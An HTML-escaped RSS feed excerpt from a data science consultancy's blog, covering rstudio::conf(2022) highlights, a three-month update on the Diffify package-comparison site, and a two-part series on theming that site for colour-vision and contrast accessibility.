&lt;p&gt;In keeping with the theme of supporting multiple programming languages, Joe Cheng&amp;rsquo;s keynote on Wednesday afternoon revealed the release of &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;Shiny for Python&lt;/a&gt;. Shiny is designed to make it simple to build interactive web applications, and now you can build them using Python as well as R. We already use both Python and R at Jumping Rivers, so this is an exciting development for us - we&amp;rsquo;ve already started playing with it!&lt;/p&gt;
&lt;p style="width: 50%; margin: auto;"&gt;
&lt;img src="shiny_python.png?raw=true" alt="Screenshot of the Shiny for Python gallery showing six examples of dashboards"&gt;
&lt;/p&gt;
&lt;p align = "center" style="font-style: italic;"&gt;
Image from &lt;a href="https://shiny.rstudio.com/py/gallery/" target = "_blank"&gt;shiny.rstudio.com/py/gallery&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="quarto"&gt;Quarto&lt;/h3&gt;
&lt;p&gt;Although &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt; has been available for a few months now, rstudio::conf(2022) marked it&amp;rsquo;s official announcement. Quarto is essentially the next generation of RMarkdown - used to join your code together with textual descriptions to create outputs in multiple formats with support for R, Python, Julia, Javascript, and many other programming languages. The keynote from Mine Cetinkaya-Rundel and Julia Lowndes showed just how incredible Quarto is for authoring and collaborating on documents in multiple formats and multiple languages. I&amp;rsquo;d definitely recommend catching up on this talk when the recordings are released if you missed it!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-highlights-rstudioconf2022"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h2 id="highlights"&gt;Highlights&lt;/h2&gt;
&lt;p&gt;There were so many incredible talks throughout the conference (and many more I&amp;rsquo;m excited to catch up on the recordings of), so here are just a few favourites.&lt;/p&gt;
&lt;h3 id="joe-cheng"&gt;&lt;a href="https://twitter.com/jcheng" rel="external"&gt;Joe Cheng&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;The Past and Future of Shiny&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s been ten years since Shiny was first released. In this keynote, Joe talked about the journey Shiny has been on - from the moment Shiny was first created (and how it was named), to the announcement of Shiny for Python (and his &amp;ldquo;&lt;a href="https://twitter.com/jcheng/status/1552428978509680642" rel="external"&gt;you write the book and I&amp;rsquo;ll build you a bike&lt;/a&gt;&amp;rdquo; exchange with Hadley).&lt;/p&gt;
&lt;h3 id="tan-ho"&gt;&lt;a href="https://twitter.com/_TanHo" rel="external"&gt;Tan Ho&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Project Immortality: Using GitHub To Make Your Work Live Forever&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In this talk, Tan showed us how to transform R scripts into projects that can live forever. He talked about converting scripts to R packages, and using some powerful features of GitHub (including GitHub Actions and GitHub Releases) to make your projects useful even after you&amp;rsquo;ve stopped developing them. Tan&amp;rsquo;s talk materials are available on &lt;a href="https://github.com/tanho63/project_immortality_with_github/" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="liz-roten"&gt;&lt;a href="https://twitter.com/LizRoten" rel="external"&gt;Liz Roten&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Oddly Satisfying - Find delight in the mundane&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Many of us have inherited projects with promises that the code will &lt;em&gt;just work&lt;/em&gt; - and then it doesn&amp;rsquo;t. Liz talked about how you tackle the problem of messy projects, including using thoughtful documentation to make the job a little easier for the next person to inherit it. Liz&amp;rsquo;s talk materials can be found on her &lt;a href="https://www.lizroten.com/oddly/" rel="external"&gt;website&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="tyler-morgan-wall"&gt;&lt;a href="https://twitter.com/tylermorganwall" rel="external"&gt;Tyler Morgan-Wall&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Building a ggplot2 rollercoaster: Creating amazing 3D data visualizations in R&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I think 3D plots are often unfairly maligned, and Tyler&amp;rsquo;s talk on how to build 3D visualisations in R showed just how informative and engaging they can be when you do them well. He also introduced the {rayrollercoaster} package for building 3D rollercoasters in R, which is one of the coolest things I&amp;rsquo;ve seen in a while.&lt;/p&gt;
&lt;h2 id="jumping-rivers-talks"&gt;Jumping Rivers Talks&lt;/h2&gt;
&lt;p&gt;As well as attending talks and chatting to conference attendees, we gave a couple of talks of our own.&lt;/p&gt;
&lt;h3 id="comparing-package-versions-with-diffify"&gt;Comparing package versions with Diffify&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://twitter.com/csgillespie" rel="external"&gt;Colin&lt;/a&gt;&amp;rsquo;s lightning talk on &lt;a href="https://diffify.com/" rel="external"&gt;diffify.com&lt;/a&gt; showed how to easily compare versions of R packages, and highlighted changes in {lubridate} as an example. Colin&amp;rsquo;s slides can be found on &lt;a href="https://github.com/rstudio/rstudio-conf/tree/master/2022/colingillespie" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p style="width: 50%; margin: auto;"&gt;
&lt;img src="colin.png?raw=true" alt="Screenshot of diffify website showing search bar and menu"&gt;
&lt;/p&gt;
&lt;h3 id="say-hello-to-multilingual-shiny-apps"&gt;Say Hello! to Multilingual Shiny Apps&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://twitter.com/nrennie35" rel="external"&gt;Nicola&lt;/a&gt; gave a lightning talk on building multilingual Shiny apps where she talked about why it&amp;rsquo;s important, and how bar charts can suddenly become not so simple when you need to output them in multiple languages. Nicola&amp;rsquo;s slides can also be found on &lt;a href="https://github.com/rstudio/rstudio-conf/tree/master/2022/nicolarennie" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p style="width: 50%; margin: auto;"&gt;
&lt;img src="nicola.png?raw=true" alt="Presentation slide with image of a dropdown menu showing four choices of language"&gt;
&lt;/p&gt;
&lt;h2 id="whats-next"&gt;What&amp;rsquo;s Next?&lt;/h2&gt;
&lt;p&gt;If you came to talk to us at the conference, you might have noticed we were running a competition to win 6 hours of free training. We&amp;rsquo;ll send an email to our winner shortly, so keep your eyes peeled - the winner could be you! If you didn&amp;rsquo;t get the chance to talk to us at the conference, you can reach out to us on &lt;a href="https://www.linkedin.com/company/jumping-rivers-ltd" rel="external"&gt;LinkedIn&lt;/a&gt;, &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;Twitter&lt;/a&gt;, or through our &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Recordings for talks will be available online in a few weeks but if that&amp;rsquo;s not enough, you can already sign up for next year! The first ever posit::conf(2023) will take place in Orlando, Florida on May 22 - 25, 2023. &lt;a href="https://na.eventscloud.com/ereg/index.php?eventid=705462" rel="external"&gt;Early bird registration&lt;/a&gt; is open now!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify - 3 months on</title><link>https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/</link><pubDate>Tue, 09 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/diffify_logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re now three months on from the initial release of Diffify, and what a few months it&amp;rsquo;s been! We thought now seemed like a good time to give you an overview of the big updates that Diffify has been through since it&amp;rsquo;s launch.&lt;/p&gt;
&lt;h3 id="recognition-and-user-feedback"&gt;Recognition and user feedback&lt;/h3&gt;
&lt;p&gt;We are delighted to see that our app has been quickly adopted by the R community:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://rweekly.org/" rel="external"&gt;R Weekly&lt;/a&gt; now displays links to Diffify for updated CRAN packages!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Our very own &lt;a href="https://twitter.com/csgillespie" rel="external"&gt;Colin Gillespie&lt;/a&gt; has just presented &lt;a href="https://sched.co/11ia3" rel="external"&gt;a talk&lt;/a&gt; on Diffify at the recent &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;RStudio Conference&lt;/a&gt;!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Lots of positive feedback on &lt;a href="https://www.linkedin.com/company/jumping-rivers-ltd/" rel="external"&gt;LinkedIn&lt;/a&gt; and &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;Twitter&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Our users have also been making some really helpful suggestions on our &lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;GitHub&lt;/a&gt;, inspiring some of the updates listed below!&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-diffify-3-month-update"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="updates-since-launch"&gt;Updates since launch&lt;/h3&gt;
&lt;p&gt;Diffify has had a lot of updates since launch, but here are a few of the biggest ones for end users:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In response to a comment from our users, we have added an option to diff against an &amp;ldquo;empty package&amp;rdquo; (e.g., &lt;a href="https://diffify.com/R/rmarkdown/empty/2.14)" rel="external"&gt;https://diffify.com/R/rmarkdown/empty/2.14)&lt;/a&gt;. This enables the user to view &lt;strong&gt;all&lt;/strong&gt; dependencies, exports and functions for a given version. It also means we avoid a blank webpage for packages that only have one version!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="empty package" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/empty_screenshot.png" width="1557"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;To increase the accessibility of the website, we&amp;rsquo;ve&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Improved the default text contrast and colours&lt;/li&gt;
&lt;li&gt;Added an option to select a theme, including a dichromat-friendly colour theme and boosted-contrast theme (the latter is set as the default theme if the user prefers it)&lt;/li&gt;
&lt;li&gt;Made the app fully accessible via keyboard navigation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you&amp;rsquo;re interested in learning more, check out the &lt;a href="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/" rel="external"&gt;recent blog series&lt;/a&gt; by our frontend developer Tim!&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="colour theme" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/theme_screenshot.png" width="1569"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The app now looks great on mobile and narrow screens:
&lt;ul&gt;
&lt;li&gt;The left-hand navigation shrinks to a side-bar&lt;/li&gt;
&lt;li&gt;We&amp;rsquo;ve fixed some visual bugs&lt;/li&gt;
&lt;li&gt;Long entries are now scrollable&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="mobile screenshot" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/mobile_screenshot.png" width="1487"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;We&amp;rsquo;ve made some improvements to readability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In the Namespace section, export type is now labelled to the right of each entry&lt;/li&gt;
&lt;li&gt;In response to a comment on Twitter, we have reduced the whitespace between sections&lt;/li&gt;
&lt;li&gt;In the Functions section, the &amp;ldquo;Arguments&amp;rdquo; dropdown is now replaced with a &amp;ldquo;No arguments&amp;rdquo; label if a function does not have any arguments&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;We&amp;rsquo;ve fixed a number of bugs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The app is now consistent across different browsers&lt;/li&gt;
&lt;li&gt;We&amp;rsquo;ve fixed various visual bugs (like NEWS text overlapping with borders)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;We&amp;rsquo;ve made some optimisations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The app is more responsive (e.g., &amp;ldquo;last updated&amp;rdquo; tooltip appears instantly)&lt;/li&gt;
&lt;li&gt;Package dropdown suggestions now match from the start of the package name&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="looking-ahead"&gt;Looking ahead&lt;/h3&gt;
&lt;p&gt;We have just completed a huge restructure of our backend code. While this is invisible to our users, it will make it &lt;strong&gt;much&lt;/strong&gt; easier for us to add new languages and package repositories (e.g., bioconductor) in the future!&lt;/p&gt;
&lt;p&gt;With that in mind, we are actively expanding Diffify to include Python packages. Stay tuned&amp;hellip;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Theming diffify for accessibility: Part 2</title><link>https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/</link><pubDate>Thu, 04 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our two part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/" rel="external"&gt;Theming diffify for accessibility: Part 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Theming diffify for accessibility: Part 2 (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In Part 1 of this two-post blog series I covered contrast sensitivity and colour vision deficiencies and related terminology. Here, in Part 2, I&amp;rsquo;ll cover the changes we made to &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt; and take a quick look at some tools we used to help us.&lt;/p&gt;
&lt;h2 id="theming"&gt;Theming&lt;/h2&gt;
&lt;p&gt;It&amp;rsquo;s difficult to design a website that is &amp;ldquo;just right&amp;rdquo; for everyone. For instance, while reds and greens can be difficult to discern for some dichromats and anomalous trichromats, most trichromats have no such problem (peak daylight sensitivity lies in the yellow part of the spectrum, between red and green). Moreover, these colours also have common cultural semantics (though these do, of course, vary by culture). We also care about aesthetics.&lt;/p&gt;
&lt;p&gt;Because of this conflict and more besides, we decided the best approach to making the site more accessible was through &amp;ldquo;theming&amp;rdquo;. To quote &lt;a href="https://en.wikipedia.org/wiki/Theme_(computing)" rel="external"&gt;Wikipedia&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In computing, a theme is a preset package containing graphical appearance and functionality details. A theme usually comprises a set of shapes and colors for the graphical control elements, the window decoration and the window. Themes are used to customize the look and feel of a piece of computer software or of an operating system.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We felt this offered a best-of-both-worlds approach - the site can remain aesthetically pleasing for our regular users (we hope) while offering a more accessible experience to those with visual impairments. Theming also makes things extensible - we can add more themes with time (e.g. dark mode, perhaps?).&lt;/p&gt;
&lt;p&gt;For a site of the modest size of &lt;a href="https://diffify.com" rel="external"&gt;diffify&lt;/a&gt; this meant the addition of a dropdown menu from which the user can select a theme (see below), a few lines of JavaScript to update the theme when the user changes their selection from the menu and some &lt;a href="https://en.wikipedia.org/wiki/CSS" rel="external"&gt;CSS rules&lt;/a&gt; for each theme. (We actually use &lt;a href="https://en.wikipedia.org/wiki/Sass_(stylesheet_language)" rel="external"&gt;Sass&lt;/a&gt;, that helps keep the code &lt;a href="https://en.wikipedia.org/wiki/Don%27t_repeat_yourself" rel="external"&gt;DRY&lt;/a&gt;, but the resulting output is still CSS.)&lt;/p&gt;
&lt;img src="images/dropdown.png" srcset="images/dropdown@2x.png 2x" style="width: 307px; display: block; margin-left: auto; margin-right: auto" alt="A screenshot of the new theme-selection dropdown menu." /&gt;
&lt;p&gt;Through this approach, maintaining a theme means updating CSS rules, while adding a theme means adding CSS rules and an extra option in the dropdown menu. There is no real requirement on a maintainer to be a JavaScript expert.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-theming-diffify-for-accessibility-2"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="our-themes"&gt;Our themes&lt;/h2&gt;
&lt;p&gt;At the time of writing we have three themes for the user to choose from.&lt;/p&gt;
&lt;h3 id="default"&gt;Default&lt;/h3&gt;
&lt;p&gt;As the name suggests, this is the theme you will probably see when you first come to the site in a particular browser. While this theme should work for most users, a few of the text elements have lower contrast than required to meet the WCAG AA standard (see below) and as we showed in Part 1, some people with colour vision deficiencies might struggle to discern the different types of entries by colour alone.&lt;/p&gt;
&lt;h3 id="boosted-contrast"&gt;Boosted contrast&lt;/h3&gt;
&lt;p&gt;As the name suggests, the Boosted contrast theme increases the contrast between the text and the background that it sits on (when compared to the Default theme) to meet the &lt;a href="https://www.w3.org/TR/WCAG21/#contrast-minimum" rel="external"&gt;WCAG 2.1 Level AA standard&lt;/a&gt;. This includes changing the font and background colours of the buttons and entries in the various sections and also the color of tab links and the body text itself. We hope this theme makes using diffify a nice experience for those with impaired contrast sensitivity.&lt;/p&gt;
&lt;img src="images/suggests-boosted-contrast.png" srcset="images/suggests-boosted-contrast@2x.png 2x" alt="A screenshot of part of a diffify page with the Boosted contrast theme applied." /&gt;
&lt;p&gt;While the Default theme will be the theme that shows up for most visitors the first time they arrive at the site, for a few it will be this theme. We now check whether the user has specified a preference for higher contrast and, if so, default to this theme. (For the technically minded, this preference information is available through the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/CSS/@media/prefers-contrast" rel="external"&gt;&amp;ldquo;prefers-contrast&amp;rdquo;&lt;/a&gt; CSS media query or via the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/matchMedia" rel="external"&gt;matchMedia&lt;/a&gt; JavaScript interface.)&lt;/p&gt;
&lt;h3 id="dichromat-friendly"&gt;Dichromat friendly&lt;/h3&gt;
&lt;p&gt;This is our new theme that we hope makes for a nicer experience for users with dichromacy and anomalous trichromacy. The colours used for &amp;ldquo;Added&amp;rdquo;, &amp;ldquo;Removed&amp;rdquo; and &amp;ldquo;Changed&amp;rdquo; buttons and entries should be mutually distinguishable for protanopes, deuteranopes and tritanopes (and their anomalous trichromat counterparts). They are modified versions of the &amp;ldquo;3-class Dark 2&amp;rdquo; palette from &lt;a href="https://colorbrewer2.org/#type=qualitative&amp;scheme=Dark2&amp;n=3" rel="external"&gt;Colorbrewer 2.0&lt;/a&gt;, with decreased transparency to make the black text clearer.&lt;/p&gt;
&lt;p&gt;The image below shows a screenshot of this theme. The bottom-left half of the screenshot has had a deuteranopia filter applied to it using the &amp;ldquo;Sim Daltonism&amp;rdquo; application (see below). The simulation implies that the three types of entries (Added, Removed, Changed) should be distinguishable by colour alone to both trichromats and dichromats with deuteranopia. We also used Sim Daltonism to check the appearance of the app with the other dichromat and anomalous trichromat impairments described in Part 1.&lt;/p&gt;
&lt;img src="images/dichromat-deut.png" srcset="images/dichromat-deut@2x.png 2x" alt="A screenshot of a section from diffify using the dichromat theme. The top-left half of the image assumes normal vision. The bottom-left half of the image applies a deuternopia filter using the Sim Daltonism software." /&gt;
&lt;h2 id="testing-themes"&gt;Testing themes&lt;/h2&gt;
&lt;p&gt;This section looks at tools used to test our themes. It is largely aimed at website developers and some familiarity with &lt;a href="https://developer.chrome.com/docs/devtools/" rel="external"&gt;Chrome DevTools&lt;/a&gt; may be helpful.&lt;/p&gt;
&lt;h3 id="looking-for-low-contrast-text"&gt;Looking for low-contrast text&lt;/h3&gt;
&lt;p&gt;To find any text of insufficient contrast we used Chrome DevTools and a built in application called &lt;a href="https://github.com/GoogleChrome/lighthouse" rel="external"&gt;Lighthouse&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Lighthouse analyzes web apps and web pages, collecting modern performance metrics and insights on developer best practices.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To use Lighthouse to look for low-contrast text you need to open the DevTools, select the Lighthouse tab and make sure the &amp;ldquo;Accessibility&amp;rdquo; option is checked before clicking &amp;ldquo;Analyze page load&amp;rdquo; (&amp;ldquo;Generate report&amp;rdquo; in older versions of Chrome). The WCAG AA requirements for contrast ratio change with text size so if your text changes size going from large to small screens you may want to generate a report for both Device settings. (The &amp;ldquo;Mode&amp;rdquo; setting is new, but the default &amp;ldquo;Navigation&amp;rdquo; setting matches the behaviour in older versions of the app.)&lt;/p&gt;
&lt;img src="images/generate-report.png" srcset="images/generate-report@2x.png 2x" alt="A screenshot of the 'Lighthouse' tab in Chrome DevTools." /&gt;
&lt;p&gt;If there is any visible text on the page (at load time) that lacks sufficient contrast, the Lighthouse report will flag that &amp;ldquo;Background and foreground colors do not have a sufficient contrast ratio&amp;rdquo;, along with any of the other automatable accessibility test failures it has found (e.g. images lacking alt text). Open the disclosure triangle to see which elements are problematic.&lt;/p&gt;
&lt;img src="images/low-contrast-text.png" srcset="images/low-contrast-text@2x.png 2x" alt="A screenshot of a Lighthouse report that shows that link text does not have sufficient contrast." /&gt;
&lt;h3 id="testing-the-high-contrast-preference"&gt;Testing the high-contrast preference&lt;/h3&gt;
&lt;p&gt;As mentioned above, &lt;a href="https://diffify.com" rel="external"&gt;diffify&lt;/a&gt; will check whether first-time visitors to the site have a preference for high contrast and set the initial theme accordingly. A user may specify their preference through their operating system, so a developer can too. But Chrome DevTools also allow developers to override this value (and those of other CSS media features) on a temporary basis through a &lt;a href="https://developer.chrome.com/docs/devtools/rendering/emulate-css/#emulate-css-media-feature-prefers-contrast" rel="external"&gt;dropdown setting found in the Rendering tab&lt;/a&gt;.&lt;/p&gt;
&lt;img src="images/prefers-contrast.png" srcset="images/prefers-contrast@2x.png 2x" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="A screenshot of part of the Chrome DevTools Rendering tab, showing the 'Emulate CSS meadia-feature prefers contrast' dropdown menu" /&gt;
&lt;h3 id="simulating-colour-vision-deficiencies"&gt;Simulating Colour Vision Deficiencies&lt;/h3&gt;
&lt;h4 id="sim-daltonism"&gt;Sim Daltonism&lt;/h4&gt;
&lt;p&gt;Sim Daltonism is an app that is available for MacOS and iOS. Both versions let the user choose a colour vision deficiency and presents a simulation to them. On an iOS device the source &amp;lsquo;image&amp;rsquo; is the live feed from either a front or rear facing camera: if you&amp;rsquo;re a trichromat you can use it to see the &amp;lsquo;real world&amp;rsquo; through the eyes of a dichromat. The MacOS version presents a rectangular box on the screen that can be moved and resized. Within the box, the simulation is applied to the content that lies beneath it, as shown in the image below. Using this we could quickly test how our themes would look to users with any of the colour vision conditions described in Part 1.&lt;/p&gt;
&lt;img src="images/sim-daltonism.png" srcset="images/sim-daltonism@2x.png 2x" alt="A screenshot of part of a page of diffify with the Sim Daltonism window overlaid over much of it and the 'Protanopia' simulation applied." /&gt;
&lt;h4 id="chrome-devtools"&gt;Chrome DevTools&lt;/h4&gt;
&lt;p&gt;I also used the &amp;ldquo;Emulate vision deficiencies&amp;rdquo; option built in to recent versions of Google Chrome&amp;rsquo;s DevTools. Because it&amp;rsquo;s built into Chrome, you can use it on Windows or Linux, as well as Mac. Currently the simulations available are protanopia, deuteranopia, and tritanopia plus achromatopsia (a form of monochromatism) and blurred vision. Like the Emulate CSS media features described above, this can be found in the Rendering tab. Addy Osmani, a senior engineer at Google, has written a &lt;a href="https://addyosmani.com/blog/emulate-vision-deficiencies-devtools/" rel="external"&gt;helpful blog post explaining everything&lt;/a&gt;.&lt;/p&gt;
&lt;img src="images/emulate-vision-deficiencies.png" srcset="images/emulate-vision-deficiencies@2x.png 2x" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="A screenshot of part of the Chrome DevTools Rendering tab, showing the 'Emulate vision deficiencies' dropdown menu" /&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Theming diffify for accessibility: Part 1</title><link>https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/</link><pubDate>Thu, 28 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1//header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our two part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Theming diffify for accessibility: Part 1 (this post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/" rel="external"&gt;Theming diffify for accessibility: Part 2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For most web developers the switch from desktop or laptop to mobile device will be something they do most days. We know what a designed-only-for-desktop experience feels like on a mobile device and it isn&amp;rsquo;t great. But accessibility on the web isn&amp;rsquo;t &lt;em&gt;just&lt;/em&gt; about checking that your website is largely agnostic to the physical size of your users&amp;rsquo; screens, it&amp;rsquo;s also about making your content available to those users who have physiological impairments. For those of us fortunate enough to have close-to-normal vision (perhaps after correction) and good fine-motor-control it&amp;rsquo;s easy to forget that others do not.&lt;/p&gt;
&lt;p&gt;In this blog post and a follow up I&amp;rsquo;m going to describe why and how we used theming to make &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt; more accessible to users who suffer from some common visual impairments. Here in Part 1 I&amp;rsquo;ll cover some of the science and the terminology. Part 2 will look at the actual changes we made.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-theming-diffify-for-accessibility-1"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="impaired-contrast-sensitivity"&gt;Impaired contrast sensitivity&lt;/h2&gt;
&lt;p&gt;Contrast sensitivity is a measure of our ability to distinguish between foreground and background objects of differing &lt;a href="https://en.wikipedia.org/wiki/Luminance" rel="external"&gt;luminance&lt;/a&gt;. Correspondingly, people with low/impaired contrast sensitivity may struggle when the difference in luminance between foreground and background objects is small. In our particular case we&amp;rsquo;re talking about foreground text on a solid-colour background.&lt;/p&gt;
&lt;p&gt;Impaired contrast sensitivity is associated with a number of physiological conditions. Some of these seemed obvious to me - cataracts, glaucoma, macular degeneration. Others less so - diabetes, &lt;a href="https://ncbi.nlm.nih.gov/pmc/articles/PMC5222688/" rel="external"&gt;Parkinson&amp;rsquo;s disease&lt;/a&gt;. Moreover, as highlighted by &lt;a href="https://mrfirthy.me/" rel="external"&gt;Ashley Firth&lt;/a&gt; (in Chapter 3 of his excellent book &lt;a href="https://inclusive.guide/" rel="external"&gt;&amp;ldquo;Practical Web Inclusion and Accessibility&amp;rdquo;&lt;/a&gt;), low-contrast text can also be a struggle for those experiencing a temporary condition such as a migraine or, simply, tiredness.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://www.w3.org/TR/WCAG21/" rel="external"&gt;Web Content Accessibility Guidelines (WCAG)&lt;/a&gt; set out some complicitly standards for contrast levels (and much much more besides). We wanted to ensure we offered an option that meets their &lt;a href="https://www.w3.org/TR/WCAG21/#x1-4-3-contrast-minimum" rel="external"&gt;AA standard&lt;/a&gt; for text.&lt;/p&gt;
